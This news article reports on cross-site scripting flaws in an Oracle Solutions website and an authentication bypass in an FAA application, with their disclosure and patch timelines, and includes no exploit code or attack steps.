Some vendors respond fast, while for others it takes a year
Researchers from the Vulnerability Laboratory have found that two other important public websites are vulnerable to remote attacks. This time, the sites belonging to the Federal Aviation Administration (FAA) and Oracle Solutions were identified as containing security flaws.Ucha Gobejishvili, also known as longrifle0x, is the one that found a couple of cross-site scripting (XSS) vulnerabilities in the Oracle Solutions website.
One persistent and one non-persistent weakness have been identified. If exploited they could allow a remote attacker with user interaction or with a local low-privileged account to hijack customer, moderator, or administrator sessions.
This could then be utilized for phishing and client/application-side content request manipulation.
The vendor was notified on the issue on December 28, 2011, and it responded two days later. A patch was issued on January 17, Vulnerability Labs publicly disclosing the problems that existed, eleven days later.
The bug found in the Partner Search Listing module was estimated as a medium risk.
With FAA the situation was a bit different. They were notified by the security experts on three occasions: February 2, March 23 and July 19, 2011.
Sometime between those dates and January 28, 2012, the vendor responded and resolved the authentication bypass issue that affected their official site.
The vulnerability was detected in AFS Evaluation Application System’s login form, which allowed a remote attacker to bypass the application without requiring authorization credentials.
If exploited successfully, the bug could have been utilized to overtake the site’s database management system and the academy’s website by using SQL injection.
This was considered a critical severity flaw and it’s a good thing that FAA addressed it, even if it took them some time.
A lot of websites were found to be vulnerable in the past few days. Ucha Gobejishvili revealed some XSS problems in sites such as Google, Ferrari, MTV, and a group of hackers called TeamHav0k found the same types of flaws in some major US government sites.